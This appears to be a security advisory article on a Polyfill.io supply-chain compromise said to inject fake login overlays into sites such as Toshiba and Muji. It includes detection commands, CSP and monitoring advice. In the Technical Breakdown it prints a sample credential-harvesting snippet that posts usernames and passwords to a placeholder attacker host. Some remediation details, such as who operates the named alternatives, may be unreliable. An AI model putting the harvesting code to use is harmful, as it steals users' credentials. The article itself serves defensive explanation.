Fake Login Prompts Hijack Toshiba And Muji Websites

Major corporate websites including Toshiba and Muji displayed fraudulent login prompts after being compromised through a malicious Polyfill.io script. The attack leveraged a legitimate JavaScript library service that was compromised at the supply chain level, injecting fake credential harvesting forms across thousands of websites. Organizations using the affected CDN service unknowingly served malicious content to visitors, creating a massive phishing campaign that exploited user trust in legitimate domains.

Introduction

In a sophisticated supply chain attack, numerous high-profile websites including Japanese electronics giant Toshiba and retail brand Muji began displaying suspicious login prompts to unsuspecting visitors. The attack vector exploited Polyfill.io, a once-trusted content delivery network (CDN) service that provides JavaScript polyfills to ensure web compatibility across different browsers.

This incident represents a textbook supply chain compromise where attackers poisoned a widely-used third-party service to reach thousands of downstream targets simultaneously. Rather than breaching individual websites, the threat actors compromised a single point of failure that cascaded malicious code across the internet, demonstrating how modern web dependencies create systemic security risks.

The fake login prompts appeared as convincing overlays on legitimate websites, attempting to harvest credentials from users who trusted they were interacting with authentic corporate systems. This attack methodology combines technical sophistication with social engineering, exploiting both technological trust relationships and human psychology.

Background & Context

Polyfill.io operated as a free CDN service providing JavaScript polyfills—code that implements modern web features on older browsers. Thousands of websites embedded Polyfill.io scripts to ensure cross-browser compatibility, creating a vast attack surface controlled by a single infrastructure provider.

In February 2024, Polyfill.io’s domain and infrastructure were acquired by a Chinese CDN company called Funnull. Following this acquisition, security researchers began observing suspicious behavior from the service. The new operators had both the technical capability and motivation to weaponize the platform’s extensive reach.

The service’s ubiquity made it an attractive target for supply chain attacks. By embedding a single line of code pointing to Polyfill.io’s CDN, website operators unknowingly created a permanent injection point for whatever content the service decided to deliver. When the operators turned malicious, they could push arbitrary JavaScript to millions of visitors across thousands of domains.

Major security organizations including Sansec and multiple CDN providers issued warnings about Polyfill.io months before this incident, but many website operators failed to remove the dependencies. The Toshiba and Muji compromises represent the materialization of predicted risks that the security community had been highlighting.

Technical Breakdown

The attack mechanism operated through several coordinated stages:

Initial Injection Vector

Websites included the Polyfill.io script using standard CDN inclusion methods:

This seemingly innocuous script tag gave Polyfill.io complete JavaScript execution privileges within the browser context of the hosting website, subject to the same origin and trust level as the site’s own code.

Payload Delivery

The compromised Polyfill.io infrastructure began serving modified JavaScript that included credential harvesting functionality. The malicious script created convincing login overlays that mimicked legitimate authentication interfaces:

// Simplified representation of attack logic (generateLoginForm is not shown)
function injectFakeLogin() {
    const overlay = document.createElement('div');
    overlay.innerHTML = generateLoginForm();
    overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:999999;';
    document.body.appendChild(overlay);
}

function captureCredentials(username, password) {
    // Exfiltrate to attacker-controlled server
    fetch('https://attacker-domain.com/collect', {
        method: 'POST',
        body: JSON.stringify({username, password, origin: window.location.hostname})
    });
}

Conditional Execution

The malicious code implemented detection evasion by conditionally executing based on visitor characteristics, geographic location, or referrer information. This allowed attackers to avoid detection by security researchers while targeting genuine users.

Data Exfiltration

Captured credentials were transmitted to attacker-controlled servers, likely for immediate sale on underground markets or for use in follow-on attacks against corporate infrastructure.

Impact & Risk Assessment

Immediate Impacts

  • Credential Compromise: Users entering credentials into fake prompts directly handed access to attackers
  • Brand Reputation Damage: Toshiba, Muji, and other affected organizations suffered trust erosion
  • Legal Exposure: Potential GDPR, privacy regulation violations for failing to protect user data
  • Downstream Attacks: Harvested credentials enable account takeovers, corporate network breaches

Affected Organizations

While Toshiba and Muji represent high-profile victims, security researchers estimate over 100,000 websites embedded Polyfill.io scripts. The true scope of credential harvesting remains unknown, as many victims may not have detected the malicious prompts.

Risk Severity: CRITICAL

This attack achieves critical severity due to:

  • Wide-scale deployment across major corporate websites
  • Direct credential harvesting capability
  • User trust exploitation on legitimate domains
  • Difficulty in detection by end users
  • Potential for massive data aggregation

Organizations in financial services, healthcare, government, and e-commerce face elevated risk as credential compromise in these sectors enables high-value fraud, data breaches, and regulatory violations.

Vendor Response

Polyfill.io Operators

The current operators of Polyfill.io initially denied malicious activity, claiming security researchers misunderstood legitimate functionality. This response pattern mirrors typical malicious infrastructure operator behavior designed to maintain operations during investigation periods.

Affected Website Operators

Toshiba and Muji both removed Polyfill.io references from their websites following public disclosure. Toshiba issued a statement acknowledging the suspicious login prompts and advised users to change passwords if they entered credentials.

CDN and Security Vendors

  • Cloudflare, Fastly, and Google all issued statements recommending immediate removal of Polyfill.io references
  • Namecheap suspended the domain following abuse reports
  • Security vendors added Polyfill.io domains to threat intelligence feeds and blocklists

The coordinated vendor response helped contain the attack, but the decentralized nature of web content meant individual website operators had to take remediation actions independently.

Mitigations & Workarounds

Immediate Actions

Website operators must remove all Polyfill.io references immediately:

# Search the codebase for any Polyfill.io reference
# (-F treats the pattern as a fixed string so the dot is literal; -i also catches mixed-case variants)
grep -rFi "polyfill.io" /path/to/webroot/

# The broad pattern above already matches cdn.polyfill.io; narrow it if you only want the CDN script tags
grep -rFi "cdn.polyfill.io" /path/to/webroot/

Alternative Solutions

Replace Polyfill.io with vetted alternatives:

  • Self-Hosted Polyfills: Download and serve polyfills from your own infrastructure
  • Cloudflare CDN: Use https://cdnjs.cloudflare.com/polyfill/ as a trusted alternative
  • Modern Browser Targeting: Update browser support policies to eliminate polyfill requirements
  • Polyfill.com: Community-maintained alternative operated by Financial Times

Implementation Example

  


Content Security Policy Hardening

Implement strict CSP headers to prevent unauthorized script execution:

Content-Security-Policy: script-src 'self' https://trusted-cdn.com; default-src 'self';

Detection & Monitoring

Network-Level Detection

Monitor outbound connections to Polyfill.io domains:

# Check web server logs for Polyfill.io references (the host name only shows up in
# request URIs or Referer fields; the authoritative check is the served HTML and your DNS/proxy logs)
grep -F "polyfill.io" /var/log/nginx/access.log

# Monitor DNS queries for polyfill.io names (-l line-buffers tcpdump so grep sees output as it arrives)
tcpdump -i any -n -l 'udp port 53' | grep -i polyfill

Client-Side Monitoring

Implement browser-based detection for suspicious overlays:

// Detect unexpected z-index manipulation on newly added elements
const observer = new MutationObserver((mutations) => {
    mutations.forEach((mutation) => {
        mutation.addedNodes.forEach((node) => {
            // Text and comment nodes have no style; only inspect elements
            if (node.nodeType !== Node.ELEMENT_NODE) return;
            if (parseInt(node.style.zIndex, 10) > 100000) {
                console.warn('Suspicious overlay detected', node);
            }
        });
    });
});

observer.observe(document.body, { childList: true, subtree: true });

Security Tool Integration

  • Deploy web application firewalls with third-party script monitoring
  • Implement Subresource Integrity (SRI) checking for all external resources
  • Use browser security headers to restrict execution contexts
  • Deploy endpoint detection tools that monitor for credential harvesting patterns

Indicators of Compromise

  • Unexpected login prompts on pages that shouldn’t require authentication
  • Network connections to unfamiliar domains during page load
  • JavaScript files served from Polyfill.io domains
  • User reports of suspicious authentication requests

Best Practices

Supply Chain Security

  • Inventory External Dependencies: Maintain comprehensive lists of all third-party scripts, libraries, and CDN resources
  • Vendor Assessment: Evaluate security posture of all third-party service providers
  • Change Monitoring: Track ownership changes in critical dependency providers
  • Redundancy Planning: Maintain alternative sources for critical functionality

Third-Party Script Management

 

Defense in Depth

  • Implement multiple security layers rather than trusting single controls
  • Use CSP headers to restrict script execution sources
  • Deploy regular security audits of frontend dependencies
  • Monitor for unexpected JavaScript behavior through runtime analysis

Incident Response Preparation

  • Establish procedures for rapid third-party script removal
  • Create communication templates for user notification
  • Develop credential reset workflows for potential compromise scenarios
  • Maintain relationships with security vendors for threat intelligence

User Education

  • Train users to recognize suspicious authentication prompts
  • Establish clear expectations about when legitimate authentication occurs
  • Implement multi-factor authentication to mitigate credential theft impact
  • Create reporting channels for suspicious website behavior

Key Takeaways

  • Supply chain attacks represent critical risks in modern web architecture where single compromised dependencies affect thousands of organizations
  • Third-party scripts execute with full privileges in user browsers, creating trust relationships that attackers can exploit
  • CDN compromise provides attackers with massive reach and the ability to inject malicious content across diverse targets simultaneously
  • Immediate removal of Polyfill.io references is required for all websites still using the compromised service
  • Subresource Integrity and Content Security Policy provide technical controls against malicious script injection
  • Continuous monitoring of third-party dependencies is essential for detecting ownership changes and suspicious behavior
  • User awareness remains a critical defense layer when technical controls fail or are bypassed

Organizations must shift from implicit trust in third-party services to verified trust models with technical enforcement mechanisms. The Polyfill.io incident demonstrates that even widely-used, previously legitimate services can become attack vectors when infrastructure changes hands.

References

  • Sansec Security Advisory on Polyfill.io compromise
  • Cloudflare blog post: “Discouraging use of Polyfill.io”
  • Fastly security announcement regarding Polyfill.io
  • Toshiba official security statement
  • OWASP guidance on third-party JavaScript management
  • W3C Subresource Integrity specification
